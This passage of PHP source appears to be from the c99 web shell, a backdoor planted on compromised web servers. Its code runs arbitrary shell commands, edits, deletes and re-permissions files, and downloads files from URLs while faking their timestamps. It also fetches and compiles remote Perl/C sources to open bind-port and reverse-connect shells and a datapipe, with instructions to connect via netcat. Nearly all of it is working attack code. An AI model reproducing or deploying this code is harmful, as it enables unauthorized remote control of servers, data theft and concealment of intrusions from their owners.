(empty($search_name)) {$search_name = "(.*)"; $search_name_regexp = 1;} if (empty($search_text_wwo)) {$search_text_regexp = 0;} if (!empty($submit)) { $found = array(); $found_d = 0; $found_f = 0; $search_i_f = 0; $search_i_d = 0; $a = array ( "name"=>$search_name, "name_regexp"=>$search_name_regexp, "text"=>$search_text, "text_regexp"=>$search_text_regxp, "text_wwo"=>$search_text_wwo, "text_cs"=>$search_text_cs, "text_not"=>$search_text_not ); $searchtime = getmicrotime(); $in = array_unique(explode(";",$search_in)); foreach($in as $v) {c99fsearch($v);} $searchtime = round(getmicrotime()-$searchtime,4); if (count($found) == 0) {echo "<b>No files found!</b>";} else { $ls_arr = $found; $disp_fullpath = TRUE; $act = "ls"; } } echo "<form method=POST> <input type=hidden name=\"d\" value=\"".$dispd."\"><input type=hidden name=act value=\"".$dspact."\"> <b>Search for (file/folder name): </b><input type=\"text\" name=\"search_name\" size=\"".round(strlen($search_name)+25)."\" value=\"".htmlspecialchars($search_name)."\"> <input type=\"checkbox\" name=\"search_name_regexp\" value=\"1\" ".($search_name_regexp == 1?" checked":"")."> - regexp <br><b>Search in (explode \";\"): </b><input type=\"text\" name=\"search_in\" size=\"".round(strlen($search_in)+25)."\" value=\"".htmlspecialchars($search_in)."\"> <br><br><b>Text:</b><br><textarea name=\"search_text\" cols=\"122\" rows=\"10\">".htmlspecialchars($search_text)."</textarea> <br><br><input type=\"checkbox\" name=\"search_text_regexp\" value=\"1\" ".($search_text_regexp == 1?" checked":"")."> - regexp <input type=\"checkbox\" name=\"search_text_wwo\" value=\"1\" ".($search_text_wwo == 1?" checked":"")."> - <u>w</u>hole words only <input type=\"checkbox\" name=\"search_text_cs\" value=\"1\" ".($search_text_cs == 1?" checked":"")."> - cas<u>e</u> sensitive <input type=\"checkbox\" name=\"search_text_not\" value=\"1\" ".($search_text_not == 1?" checked":"")."> - find files <u>NOT</u> containing the text <br><br><input type=submit name=submit value=\"Search\"></form>"; if ($act == "ls") {$dspact = $act; echo "<hr size=\"1\" noshade><b>Search took ".$searchtime." secs (".$search_i_f." files and ".$search_i_d." folders, ".round(($search_i_f+$search_i_d)/$searchtime,4)." objects per second).</b><br><br>";} } if ($act == "chmod") { $mode = fileperms($d.$f); if (!$mode) {echo "<b>Change file-mode with error:</b> can't get current value.";} else { $form = TRUE; if ($chmod_submit) { $octet = "0".base_convert(($chmod_o["r"]?1:0).($chmod_o["w"]?1:0).($chmod_o["x"]?1:0).($chmod_g["r"]?1:0).($chmod_g["w"]?1:0).($chmod_g["x"]?1:0).($chmod_w["r"]?1:0).($chmod_w["w"]?1:0).($chmod_w["x"]?1:0),2,8); if (chmod($d.$f,$octet)) {$act = "ls"; $form = FALSE; $err = "";} else {$err = "Can't chmod to ".$octet.".";} } if ($form) { $perms = parse_perms($mode); echo "<b>Changing file-mode (".$d.$f."), ".view_perms_color($d.$f)." (".substr(decoct(fileperms($d.$f)),-4,4).")</b><br>".($err?"<b>Error:</b> ".$err:"")."<form action=\"".$surl."\" method=POST><input type=hidden name=d value=\"".htmlspecialchars($d)."\"><input type=hidden name=f value=\"".htmlspecialchars($f)."\"><input type=hidden name=act value=chmod><table align=left width=300 border=0 cellspacing=0 cellpadding=5><tr><td><b>Owner</b><br><br><input type=checkbox NAME=chmod_o[r] value=1".($perms["o"]["r"]?" checked":"")."> Read<br><input type=checkbox name=chmod_o[w] value=1".($perms["o"]["w"]?" checked":"")."> Write<br><input type=checkbox NAME=chmod_o[x] value=1".($perms["o"]["x"]?" checked":"").">eXecute</td><td><b>Group</b><br><br><input type=checkbox NAME=chmod_g[r] value=1".($perms["g"]["r"]?" checked":"")."> Read<br><input type=checkbox NAME=chmod_g[w] value=1".($perms["g"]["w"]?" checked":"")."> Write<br><input type=checkbox NAME=chmod_g[x] value=1".($perms["g"]["x"]?" checked":"").">eXecute</font></td><td><b>World</b><br><br><input type=checkbox NAME=chmod_w[r] value=1".($perms["w"]["r"]?" checked":"")."> Read<br><input type=checkbox NAME=chmod_w[w] value=1".($perms["w"]["w"]?" checked":"")."> Write<br><input type=checkbox NAME=chmod_w[x] value=1".($perms["w"]["x"]?" checked":"").">eXecute</font></td></tr><tr><td><input type=submit name=chmod_submit value=\"Save\"></td></tr></table></form>"; } } } if ($act == "upload") { $uploadmess = ""; $uploadpath = str_replace("\\",DIRECTORY_SEPARATOR,$uploadpath); if (empty($uploadpath)) {$uploadpath = $d;} elseif (substr($uploadpath,-1) != "/") {$uploadpath .= "/";} if (!empty($submit)) { global $HTTP_POST_FILES; $uploadfile = $HTTP_POST_FILES["uploadfile"]; if (!empty($uploadfile["tmp_name"])) { if (empty($uploadfilename)) {$destin = $uploadfile["name"];} else {$destin = $userfilename;} if (!move_uploaded_file($uploadfile["tmp_name"],$uploadpath.$destin)) {$uploadmess .= "Error uploading file ".$uploadfile["name"]." (can't copy \"".$uploadfile["tmp_name"]."\" to \"".$uploadpath.$destin."\"!<br>";} } elseif (!empty($uploadurl)) { if (!empty($uploadfilename)) {$destin = $uploadfilename;} else { $destin = explode("/",$destin); $destin = $destin[count($destin)-1]; if (empty($destin)) { $i = 0; $b = ""; while(file_exists($uploadpath.$destin)) {if ($i > 0) {$b = "_".$i;} $destin = "index".$b.".html"; $i++;}} } if ((!eregi("http://",$uploadurl)) and (!eregi("https://",$uploadurl)) and (!eregi("ftp://",$uploadurl))) {echo "<b>Incorect url!</b><br>";} else { $st = getmicrotime(); $content = @file_get_contents($uploadurl); $dt = round(getmicrotime()-$st,4); if (!$content) {$uploadmess .= "Can't download file!<br>";} else { if ($filestealth) {$stat = stat($uploadpath.$destin);} $fp = fopen($uploadpath.$destin,"w"); if (!$fp) {$uploadmess .= "Error writing to file ".htmlspecialchars($destin)."!<br>";} else { fwrite($fp,$content,strlen($content)); fclose($fp); if ($filestealth) {touch($uploadpath.$destin,$stat[9],$stat[8]);} } } } } } if ($miniform) { echo "<b>".$uploadmess."</b>"; $act = "ls"; } else { echo "<b>File upload:</b><br><b>".$uploadmess."</b><form enctype=\"multipart/form-data\" method=POST><input type=\"hidden\" name=\"act\" value=\"upload\"><input type=\"hidden\" name=\"d\" value=\"".urlencode($d)."\"> Select file on your local computer: <input name=\"uploadfile\" type=\"file\"><br> or<br> Input URL: <input name=\"uploadurl\" type=\"text\" value=\"".htmlspecialchars($uploadurl)."\" size=\"70\"><br><br> Save this file dir: <input name=\"uploadpath\" size=\"70\" value=\"".$dispd."\"><br><br> File-name (auto-fill): <input name=uploadfilename size=25><br><br> <input type=checkbox name=uploadautoname value=1 id=df4> convert file name to lovercase<br><br> <input type=submit name=submit value=\"Upload\"> </form>"; } } if ($act == "delete") { $delerr = ""; foreach ($actbox as $v) { $result = FALSE; $result = fs_rmobj($v); if (!$result) {$delerr .= "Can't delete ".htmlspecialchars($v)."<br>";} } if (!empty($delerr)) {echo "<b>Deleting with errors:</b><br>".$delerr;} $act = "ls"; } if (!$usefsbuff) { if (($act == "paste") or ($act == "copy") or ($act == "cut") or ($act == "unselect")) {echo "<center><b>Sorry, buffer is disabled. For enable, set directive \"\$useFSbuff\" as TRUE.</center>";} } else { if ($act == "copy") {$err = ""; $sess_data["copy"] = array_merge($sess_data["copy"],$actbox); c99_sess_put($sess_data); $act = "ls"; } elseif ($act == "cut") {$sess_data["cut"] = array_merge($sess_data["cut"],$actbox); c99_sess_put($sess_data); $act = "ls";} elseif ($act == "unselect") {foreach ($sess_data["copy"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["copy"][$k]);}} foreach ($sess_data["cut"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["cut"][$k]);}} c99_sess_put($sess_data); $act = "ls";} if ($actemptybuff) {$sess_data["copy"] = $sess_data["cut"] = array(); c99_sess_put($sess_data);} elseif ($actpastebuff) { $psterr = ""; foreach($sess_data["copy"] as $k=>$v) { $to = $d.basename($v); if (!fs_copy_obj($v,$to)) {$psterr .= "Can't copy ".$v." to ".$to."!<br>";} if ($copy_unset) {unset($sess_data["copy"][$k]);} } foreach($sess_data["cut"] as $k=>$v) { $to = $d.basename($v); if (!fs_move_obj($v,$to)) {$psterr .= "Can't move ".$v." to ".$to."!<br>";} unset($sess_data["cut"][$k]); } c99_sess_put($sess_data); if (!empty($psterr)) {echo "<b>Pasting with errors:</b><br>".$psterr;} $act = "ls"; } elseif ($actarcbuff) { $arcerr = ""; if (substr($actarcbuff_path,-7,7) == ".tar.gz") {$ext = ".tar.gz";} else {$ext = ".tar.gz";} if ($ext == ".tar.gz") {$cmdline = "tar cfzv";} $cmdline .= " ".$actarcbuff_path; $objects = array_merge($sess_data["copy"],$sess_data["cut"]); foreach($objects as $v) { $v = str_replace("\\",DIRECTORY_SEPARATOR,$v); if (substr($v,0,strlen($d)) == $d) {$v = basename($v);} if (is_dir($v)) { if (substr($v,-1) != DIRECTORY_SEPARATOR) {$v .= DIRECTORY_SEPARATOR;} $v .= "*"; } $cmdline .= " ".$v; } $tmp = realpath("."); chdir($d); $ret = myshellexec($cmdline); chdir($tmp); if (empty($ret)) {$arcerr .= "Can't call archivator (".htmlspecialchars(str2mini($cmdline,60)).")!<br>";} $ret = str_replace("\r\n","\n",$ret); $ret = explode("\n",$ret); if ($copy_unset) {foreach($sess_data["copy"] as $k=>$v) {unset($sess_data["copy"][$k]);}} foreach($sess_data["cut"] as $k=>$v) { if (in_array($v,$ret)) {fs_rmobj($v);} unset($sess_data["cut"][$k]); } c99_sess_put($sess_data); if (!empty($arcerr)) {echo "<b>Archivation errors:</b><br>".$arcerr;} $act = "ls"; } elseif ($actpastebuff) { $psterr = ""; foreach($sess_data["copy"] as $k=>$v) { $to = $d.basename($v); if (!fs_copy_obj($v,$d)) {$psterr .= "Can't copy ".$v." to ".$to."!<br>";} if ($copy_unset) {unset($sess_data["copy"][$k]);} } foreach($sess_data["cut"] as $k=>$v) { $to = $d.basename($v); if (!fs_move_obj($v,$d)) {$psterr .= "Can't move ".$v." to ".$to."!<br>";} unset($sess_data["cut"][$k]); } c99_sess_put($sess_data); if (!empty($psterr)) {echo "<b>Pasting with errors:</b><br>".$psterr;} $act = "ls"; } } if ($act == "cmd") { if (trim($cmd) == "ps -aux") {$act = "processes";} elseif (trim($cmd) == "tasklist") {$act = "processes";} else { @chdir($chdir); if (!empty($submit)) { echo "<b>Result of execution this command</b>:<br>"; $olddir = realpath("."); @chdir($d); $ret = myshellexec($cmd); $ret = convert_cyr_string($ret,"d","w"); if ($cmd_txt) { $rows = count(explode("\r\n",$ret))+1; if ($rows < 10) {$rows = 10;} echo "<br><textarea cols=\"122\" rows=\"".$rows."\" readonly>".htmlspecialchars($ret)."</textarea>"; } else {echo $ret."<br>";} @chdir($olddir); } else {echo "<b>Execution command</b>"; if (empty($cmd_txt)) {$cmd_txt = TRUE;}} echo "<form method=POST><input type=hidden name=act value=cmd><textarea name=cmd cols=122 rows=10>".htmlspecialchars($cmd)."</textarea><input type=hidden name=\"d\" value=\"".$dispd."\"><br><br><input type=submit name=submit value=\"Execute\"> Display in text-area <input type=\"checkbox\" name=\"cmd_txt\" value=\"1\""; if ($cmd_txt) {echo " checked";} echo "></form>"; } } if ($act == "ls") { if (count($ls_arr) > 0) {$list = $ls_arr;} else { $list = array(); if ($h = @opendir($d)) { while (($o = readdir($h)) !== FALSE) {$list[] = $d.$o;} closedir($h); } else {} } if (count($list) == 0) {echo "<center><b>Can't open folder (".htmlspecialchars($d).")!</b></center>";} else { //Building array $objects = array(); $vd = "f"; //Viewing mode if ($vd == "f") { $objects["head"] = array(); $objects["folders"] = array(); $objects["links"] = array(); $objects["files"] = array(); foreach ($list as $v) { $o = basename($v); $row = array(); if ($o == ".") {$row[] = $d.$o; $row[] = "LINK";} elseif ($o == "..") {$row[] = $d.$o; $row[] = "LINK";} elseif (is_dir($v)) { if (is_link($v)) {$type = "LINK";} else {$type = "DIR";} $row[] = $v; $row[] = $type; } elseif(is_file($v)) {$row[] = $v; $row[] = filesize($v);} $row[] = filemtime($v); if (!$win) { $ow = posix_getpwuid(fileowner($v)); $gr = posix_getgrgid(filegroup($v)); $row[] = ($ow["name"]?$ow["name"]:fileowner($v))."/".($gr["name"]?$gr["name"]:filegroup($v)); } $row[] = fileperms($v); if (($o == ".") or ($o == "..")) {$objects["head"][] = $row;} elseif (is_link($v)) {$objects["links"][] = $row;} elseif (is_dir($v)) {$objects["folders"][] = $row;} elseif (is_file($v)) {$objects["files"][] = $row;} $i++; } $row = array(); $row[] = "<b>Name</b>"; $row[] = "<b>Size</b>"; $row[] = "<b>Modify</b>"; if (!$win) {$row[] = "<b>Owner/Group</b>";} $row[] = "<b>Perms</b>"; $row[] = "<b>Action</b>"; $parsesort = parsesort($sort); $sort = $parsesort[0].$parsesort[1]; $k = $parsesort[0]; if ($parsesort[1] != "a") {$parsesort[1] = "d";} $y = "<a href=\"#\" onclick=\"document.todo.act.value='".$dspact."';document.todo.d.value='".urlencode($d)."';document.todo.sort.value='".$k.($parsesort[1] == "a"?"d":"a").";document.todo.submit();\">"; $row[$k] .= $y; for($i=0;$i<count($row)-1;$i++) { if ($i != $k) {$row[$i] = "<a href=\"#\" onclick=\"document.todo.act.value='".$dspact."';document.todo.d.value='".urlencode($d)."';document.todo.sort.value='".$i.$parsesort[1]."';document.todo.submit();\">".$row[$i]."</a>";} } $v = $parsesort[0]; usort($objects["folders"], "tabsort"); usort($objects["links"], "tabsort"); usort($objects["files"], "tabsort"); if ($parsesort[1] == "d") { $objects["folders"] = array_reverse($objects["folders"]); $objects["files"] = array_reverse($objects["files"]); } $objects = array_merge($objects["head"],$objects["folders"],$objects["links"],$objects["files"]); $tab = array(); $tab["cols"] = array($row); $tab["head"] = array(); $tab["folders"] = array(); $tab["links"] = array(); $tab["files"] = array(); $i = 0; foreach ($objects as $a) { $v = $a[0]; $o = basename($v); $dir = dirname($v); if ($disp_fullpath) {$disppath = $v;} else {$disppath = $o;} $disppath = str2mini($disppath,60); if (in_array($v,$sess_data["cut"])) {$disppath = "<strike>".$disppath."</strike>";} elseif (in_array($v,$sess_data["copy"])) {$disppath = "<u>".$disppath."</u>";} foreach ($regxp_highlight as $r) { if (ereg($r[0],$o)) { if ((!is_numeric($r[1])) or ($r[1] > 3)) {$r[1] = 0; ob_clean(); echo "Warning! Configuration error in \$regxp_highlight[".$k."][0] - unknown command."; c99shexit();} else { $r[1] = round($r[1]); $isdir = is_dir($v); if (($r[1] == 0) or (($r[1] == 1) and !$isdir) or (($r[1] == 2) and !$isdir)) { if (empty($r[2])) {$r[2] = "<b>"; $r[3] = "</b>";} $disppath = $r[2].$disppath.$r[3]; if ($r[4]) {break;} } } } } $uo = urlencode($o); $ud = urlencode($dir); $uv = urlencode($v); $row = array(); if ($o == ".") { $row[] = "<a href=\"#\" onclick=\"document.todo.act.value='".$dspact."';document.todo.d.value='".urlencode(realpath($d.$o))."';document.todo.sort.value='".$sort."';document.todo.submit();\">".$o."</a>"; $row[] = "LINK"; } elseif ($o == "..") { $row[] = "<a href=\"#\" onclick=\"document.todo.act.value='".$dspact."';document.todo.d.value='".urlencode(realpath($d.$o))."';document.todo.sort.value='".$sort."';document.todo.submit();\">".$o."</a>"; $row[] = "LINK"; } elseif (is_dir($v)) { if (is_link($v)) { $disppath .= " => ".readlink($v); $type = "LINK"; $row[] = " <a href=\"#\" onclick=\"document.todo.act.value='ls';document.todo.d.value='".$uv."';document.todo.sort.value='".$sort."';document.todo.submit();\">[".$disppath."]</a>"; } else { $type = "DIR"; $row[] = " <a href=\"#\" onclick=\"document.todo.act.value='ls';document.todo.d.value='".$uv."';document.todo.sort.value='".$sort."';document.todo.submit();\">[".$disppath."]</a>"; } $row[] = $type; } elseif(is_file($v)) { $ext = explode(".",$o); $c = count($ext)-1; $ext = $ext[$c]; $ext = strtolower($ext); $row[] = " <a href=\"#\" onclick=\"document.todo.act.value='f';document.todo.d.value='".$ud."';document.todo.f.value='".$uo."';document.todo.submit();\">".$disppath."</a>"; $row[] = view_size($a[1]); } $row[] = date("d.m.Y H:i:s",$a[2]); if (!$win) {$row[] = $a[3];} $row[] = " <a href=\"#\" onclick=\"document.todo.act.value='chmod';document.todo.d.value='".$ud."';document.todo.f.value='".$uo."';document.todo.submit();\"><b>".view_perms_color($v)."</b></a>"; if ($o == ".") {$checkbox = "<input type=\"checkbox\" name=\"actbox[]\" onclick=\"ls_reverse_all();\">"; $i--;} else {$checkbox = "<input type=\"checkbox\" name=\"actbox[]\" id=\"actbox".$i."\" value=\"".htmlspecialchars($v)."\">";} if (is_dir($v)){$row[] = "<a href=\"#\" onclick=\"document.todo.act.value='d';document.todo.d.value='".$uv."';document.todo.submit();\">I</a> ".$checkbox;} else {$row[] = "<a href=\"#\" onclick=\"document.todo.act.value='f';document.todo.f.value='".$uo."';document.todo.ft.value='info';document.todo.d.value='".$ud."';document.todo.submit();\">I</a> <a href=\"#\" onclick=\"document.todo.act.value='f';document.todo.f.value='".$uo."';document.todo.ft.value='edit';document.todo.d.value='".$ud."';document.todo.submit();\">E</a> <a href=\"#\" onclick=\"document.todo.act.value='f';document.todo.f.value='".$uo."';document.todo.ft.value='download';document.todo.d.value='".$ud."';document.todo.submit();\">D</a> ".$checkbox;} if (($o == ".") or ($o == "..")) {$tab["head"][] = $row;} elseif (is_link($v)) {$tab["links"][] = $row;} elseif (is_dir($v)) {$tab["folders"][] = $row;} elseif (is_file($v)) {$tab["files"][] = $row;} $i++; } } //Compiling table $table = array_merge($tab["cols"],$tab["head"],$tab["folders"],$tab["links"],$tab["files"]); echo "<center><b>Listing folder (".count($tab["files"])." files and ".(count($tab["folders"])+count($tab["links"]))." folders):</b></center><br><TABLE cellSpacing=0 cellPadding=0 width=100% bgColor=#333333 borderColorLight=#433333 border=0><form method=POST name=\"ls_form\"><input type=hidden name=act value=".$dspact."><input type=hidden name=d value=".$d.">"; foreach($table as $row) { echo "<tr>\r\n"; foreach($row as $v) {echo "<td>".$v."</td>\r\n";} echo "</tr>\r\n"; } echo "</table><hr size=\"1\" noshade><p align=\"right\"> <script> function ls_setcheckboxall(status) { var id = 0; var num = ".(count($table)-2)."; while (id <= num) { document.getElementById('actbox'+id).checked = status; id++; } } function ls_reverse_all() { var id = 0; var num = ".(count($table)-2)."; while (id <= num) { document.getElementById('actbox'+id).checked = !document.getElementById('actbox'+id).checked; id++; } } </script> <input type=\"button\" onclick=\"ls_setcheckboxall(1);\" value=\"Select all\"> <input type=\"button\" onclick=\"ls_setcheckboxall(0);\" value=\"Unselect all\"><b>"; if (count(array_merge($sess_data["copy"],$sess_data["cut"])) > 0 and ($usefsbuff)) { echo "<input type=submit name=actarcbuff value=\"Pack buffer to archive\"> <input type=\"text\" name=\"actarcbuff_path\" value=\"archive_".substr(md5(rand(1,1000).rand(1,1000)),0,5).".tar.gz\"> <input type=submit name=\"actpastebuff\" value=\"Paste\"> <input type=submit name=\"actemptybuff\" value=\"Empty buffer\"> "; } echo "<select name=act><option value=\"".$act."\">With selected:</option>"; echo "<option value=delete".($dspact == "delete"?" selected":"").">Delete</option>"; echo "<option value=chmod".($dspact == "chmod"?" selected":"").">Change-mode</option>"; if ($usefsbuff) { echo "<option value=cut".($dspact == "cut"?" selected":"").">Cut</option>"; echo "<option value=copy".($dspact == "copy"?" selected":"").">Copy</option>"; echo "<option value=unselect".($dspact == "unselect"?" selected":"").">Unselect</option>"; } echo "</select> <input type=submit value=\"Confirm\"></p>"; echo "</form>"; } } if ($act == "tools") { $bndportsrcs = array( "c99sh_bindport.pl"=>array("Using PERL","perl %path %port"), "c99sh_bindport.c"=>array("Using C","%path %port %pass") ); $bcsrcs = array( "c99sh_backconn.pl"=>array("Using PERL","perl %path %host %port"), "c99sh_backconn.c"=>array("Using C","%path %host %port") ); $dpsrcs = array( "c99sh_datapipe.pl"=>array("Using PERL","perl %path %localport %remotehost %remoteport"), "c99sh_datapipe.c"=>array("Using C","%path %localport %remoteport %remotehost") ); if (!is_array($bind)) {$bind = array();} if (!is_array($bc)) {$bc = array();} if (!is_array($datapipe)) {$datapipe = array();} if (!is_numeric($bind["port"])) {$bind["port"] = $bindport_port;} if (empty($bind["pass"])) {$bind["pass"] = $bindport_pass;} if (empty($bc["host"])) {$bc["host"] = getenv("REMOTE_ADDR");} if (!is_numeric($bc["port"])) {$bc["port"] = $bc_port;} if (empty($datapipe["remoteaddr"])) {$datapipe["remoteaddr"] = "irc.dalnet.ru:6667";} if (!is_numeric($datapipe["localport"])) {$datapipe["localport"] = $datapipe_localport;} if (!empty($bindsubmit)) { echo "<b>Result of binding port:</b><br>"; $v = $bndportsrcs[$bind["src"]]; if (empty($v)) {echo "Unknown file!<br>";} elseif (fsockopen(getenv("SERVER_ADDR"),$bind["port"],$errno,$errstr,0.1)) {echo "Port alredy in use, select any other!<br>";} else { $w = explode(".",$bind["src"]); $ext = $w[count($w)-1]; unset($w[count($w)-1]); $srcpath = join(".",$w).".".rand(0,999).".".$ext; $binpath = $tmpdir.join(".",$w).rand(0,999); if ($ext == "pl") {$binpath = $srcpath;} @unlink($srcpath); $fp = fopen($srcpath,"ab+"); if (!$fp) {echo "Can't write sources to \"".$srcpath."\"!<br>";} elseif (!$data = c99getsource($bind["src"])) {echo "Can't download sources!";} else { fwrite($fp,$data,strlen($data)); fclose($fp); if ($ext == "c") {$retgcc = myshellexec("gcc -o ".$binpath." ".$srcpath); @unlink($srcpath);} $v[1] = str_replace("%path",$binpath,$v[1]); $v[1] = str_replace("%port",$bind["port"],$v[1]); $v[1] = str_replace("%pass",$bind["pass"],$v[1]); $v[1] = str_replace("//","/",$v[1]); $retbind = myshellexec($v[1]." > /dev/null &"); sleep(5); $sock = fsockopen("localhost",$bind["port"],$errno,$errstr,5); if (!$sock) {echo "I can't connect to localhost:".$bind["port"]."! I think you should configure your firewall.";} else {echo "Binding... ok! Connect to <b>".getenv("SERVER_ADDR").":".$bind["port"]."</b>! You should use NetCat©, run \"<b>nc -v ".getenv("SERVER_ADDR")." ".$bind["port"]."</b>\"!<center><a href=\"#\" onclick=\"document.todo.act.value='processes';document.todo.grep.value='".basename($binpath)."';document.todo.submit();\"><u>View binder's process</u></a></center>";} } echo "<br>"; } } if (!empty($bcsubmit)) { echo "<b>Result of back connection:</b><br>"; $v = $bcsrcs[$bc["src"]]; if (empty($v)) {echo "Unknown file!<br>";} else { $w = explode(".",$bc["src"]); $ext = $w[count($w)-1]; unset($w[count($w)-1]); $srcpath = join(".",$w).".".rand(0,999).".".$ext; $binpath = $tmpdir.join(".",$w).rand(0,999); if ($ext == "pl") {$binpath = $srcpath;} @unlink($srcpath); $fp = fopen($srcpath,"ab+"); if (!$fp) {echo "Can't write sources to \"".$srcpath."\"!<br>";} elseif (!$data = c99getsource($bc["src"])) {echo "Can't download sources!";} else { fwrite($fp,$data,strlen($data)); fclose($fp); if ($ext == "c") {$retgcc = myshellexec("gcc -o ".$binpath." ".$srcpath); @unlink($srcpath);} $v[1] = str_replace("%path",$binpath,$v[1]); $v[1] = str_replace("%host",$bc["host"],$v[1]); $v[1] = str_replace("%port",$bc["port"],$v[1]); $v[1] = str_replace("//","/",$v[1]); $retbind = myshellexec($v[1]." > /dev/null &"); echo "Now script try connect to ".htmlspecialchars($bc["host"]).":".htmlspecialchars($bc["port"])."...<br>"; } } } if (!empty($dpsubmit)) { echo "<b>Result of datapipe-running:</b><br>"; $v = $dpsrcs[$datapipe["src"]]; if (empty($v)) {echo "Unknown file!<br>";} elseif (fsockopen(getenv("SERVER_ADDR"),$datapipe["port"],$errno,$errstr,0.1)) {echo "Port alredy in use, select any other!<br>";} else { $srcpath = $tmpdir.$datapipe["src"]; $w = explode(".",$datapipe["src"]); $ext = $w[count($w)-1]; unset($w[count($w)-1]); $srcpath = join(".",$w).".".rand(0,999).".".$ext; $binpath = $tmpdir.join(".",$w).rand(0,999); if ($ext == "pl") {$binpath = $srcpath;} @unlink($srcpath); $fp = fopen($srcpath,"ab+"); if (!$fp) {echo "Can't write sources to \"".$srcpath."\"!<br>";} elseif (!$data = c99getsource($datapipe["src"])) {echo "Can't download sources!";} else { fwrite($fp,$data,strlen($data)); fclose($fp); if ($ext == "c") {$retgcc = myshellexec("gcc -o ".$binpath." ".$srcpath); @unlink($srcpath);} list($datapipe["remotehost"],$datapipe["remoteport"]) = explode(":",$datapipe["remoteaddr"]); $v[1] = str_replace("%path",$binpath,$v[1]); $v[1] = str_replace("%localport",$datapipe["localport"],$v[1]); $v[1] = str_replace("%remotehost",$datapipe["remotehost"],$v[1]); $v[1] = str_replace("%remoteport",$datapipe["remoteport"],$v[1]); $v[1] = str_replace("//","/",$v[1]); $retbind = myshellexec($v[1]." > /dev/null &"); sleep(5); $sock = fsockopen("localhost",$datapipe["port"],$errno,$errstr,5); if (!$sock) {echo "I can't connect to localhost:".$datapipe["localport"]."! I think you should configure your firewall.";} else {echo "Running datapipe... ok! Connect to <b>".getenv("SERVER_ADDR").":".$datapipe["port"].", and you will connected to ".$datapipe["remoteaddr"]."</b>! You should use NetCat©, run \"<b>nc -v ".getenv("SERVER_ADDR")." ".$bind["port"]."</b>\"!<center><a href=\"#\" onclick=\"document.todo.act.value='processes';document.todo.grep.value='".basename($binpath)."';document.todo.submit();\"><u>View datapipe process</u></a></center>";} } echo "<br>"; } } ?><b>Binding port:</b><br><form method="POST"><input type=hidden name=act value=tools><input type=hidden name=d value="<?php echo $d; ?>">Port: <input type=text name="bind[port]" value="<?php echo htmlspecialchars($bind["port"]); ?>"> Password: <input type=text name="bind[pass]" value="<?php echo htmlspecialchars($bind["pass"]); ?>"> <select name="bind[src]"><?php foreach($bndportsrcs as $k=>$v) {echo "<option value=\"".$k."\""; if ($k == $bind["src"]) {echo " selected";} echo ">".$v[0]."</option>";} ?></select> <input type=submit name=bindsubmit value="Bind"></form> <b>Back connection:</b><br><form method="POST"><input type=hidden name=act value=tools><input type=hidden name=d value="<?php echo $d; ?>">HOST: <input type=text name="bc[host]" value="<?php echo htmlspecialchars($bc["host"]); ?>"> Port: <input type=text name="bc[port]" value="<?php echo htmlspecialchars($bc["port"]); ?>"> <select name="bc[src]"><?php foreach($bcsrcs as $k=>$v) {echo "<option value=\"".$k."\""; if ($k == $bc["src"]) {echo " selected";} echo ">".$v[0]."</option>";} ?></select> <input type=submit name=bcsubmit value="Connect"></form> Click "Connect" only after open port for it. You should use NetCat©, run "<b>nc -l -n -v -p <?php echo $bc_port; ?></b>"!<br><br> <b>Datapipe:</b><br><form method="POST"><input type=hidden name=act value=tools><input type=hidden name=d value="<?php echo $d; ?>">HOST: <input type=text name="datapipe[remoteaddr]" value="<?php echo htmlspecialchars($datapipe["remoteaddr"]); ?>"> Local port: <input type=text name="datapipe[localport]" value="<?php echo htmlspecialchars($datapipe["localport"]); ?>"> <select name="datapipe[src]"><?php foreach($dpsrcs as $k=>$v) {echo "<option value=\"".$k."\""; if ($k == $bc["src"]) {echo " selected";} echo ">".$v[0]."</option>";} ?></select> <input type=submit name=dpsubmit value="Run"></form><b>Note:</b> sources will be downloaded from remote server.<?php } if ($act == "processes") { echo "<b>Processes:</b><br>"; if (!$win) {$handler = "ps -aux".($grep?" | grep '".addslashes($grep)."'":"");} else {$handler = "tasklist";} $ret = myshellexec($handler); if (!$ret) {echo "Can't execute \"".$handler."\"!";} else { if (empty($processes_sort)) {$processes_sort = $sort_default;} $parsesort = parsesort($processes_sort); if (!is_numeric($parsesort[0])) {$parsesort[0] = 0;} $k = $parsesort[0]; if ($parsesort[1] != "a") {$y = "<a href=\"#\" onclick=\"document.todo.act.value='".$dspact."';document.todo.d.value='".urlencode($d)."';document.todo.processes_sort.value='".$k."a\"';document.todo.submit();\">!</a>";} else {$y = "<a href=\"#\" onclick=\"document.todo.act.value='".$dspact."';document.todo.d.value='".urlencode($d)."';document.todo.processes_sort.value='".$k."d\"';document.todo.submit();\">!</a>";} $ret = htmlspecialchars($ret); if (!$win) { if ($pid) { if (is_null($sig)) {$sig = 9;} echo "Sending signal ".$sig." to #".$pid."... "; if (posix_kill($pid,$sig)) {echo "OK.";} else {echo "ERROR.";} } while (ereg(" ",$ret)) {$ret = str_replace(" "," ",$ret);} $stack = explode("\n",$ret); $head = explode(" ",$stack[0]); unset($stack[0]); for($i=0;$i<count($head);$i++) { if ($i != $k) {$head[$i] = "<a href=\"#\" onclick=\"document.todo.act.value='".$dspact."';document.todo.d.value='".urlencode($d)."';document.todo.processes_sort.value='".$i.$parsesort[1]."';document.todo.submit();\"><b>".$head[$i]."</b></a>";} } $prcs = array(); foreach ($stack as $line) { if (!empty($line)) { echo "<tr>"; $line = explode(" ",$line); $line[10] = join(" ",array_slice($line,10)); $line = array_slice($line,0,11); if ($line[0] == get_current_user()) {$line[0] = "<font color=green>".$line[0]."</font>";} $line[] = "<a href=\"#\" onclick=\"document.todo.act.value='processes';document.todo.d.value='".urlencode($d)."';document.todo.pid.value='".$line[1]."';document.todo.sig.value='9';document.todo.submit();\"><u>KILL</u></a>"; $prcs[] = $line; echo "</tr>"; } } } else { while (ereg(" ",$ret)) {$ret = str_replace(" "," ",$ret);} while (ereg(" ",$ret)) {$ret = str_replace(" "," ",$ret);} while (ereg(" ",$ret)) {$ret = str_replace(" "," ",$ret);} while (ereg(" ",$ret)) {$ret = str_replace(" "," ",$ret);} while (ereg(" ",$ret)) {$ret = str_replace(" "," ",$ret);} while (ereg(" ",$ret)) {$ret = str_replace(" "," ",$ret);} while (ereg(" ",$ret)) {$ret = str_replace(" "," ",$ret);} while (ereg(" ",$ret)) {$ret = str_replace(" "," ",$ret);} while (ereg(" ",$ret)) {$ret = str_replace(" "," ",$ret);} while (ereg(" ",$ret)) {$ret = str_replace(" "," ",$ret);} while (ereg(" ",$ret)) {$ret = str_replace(" "," ",$ret);} $ret = 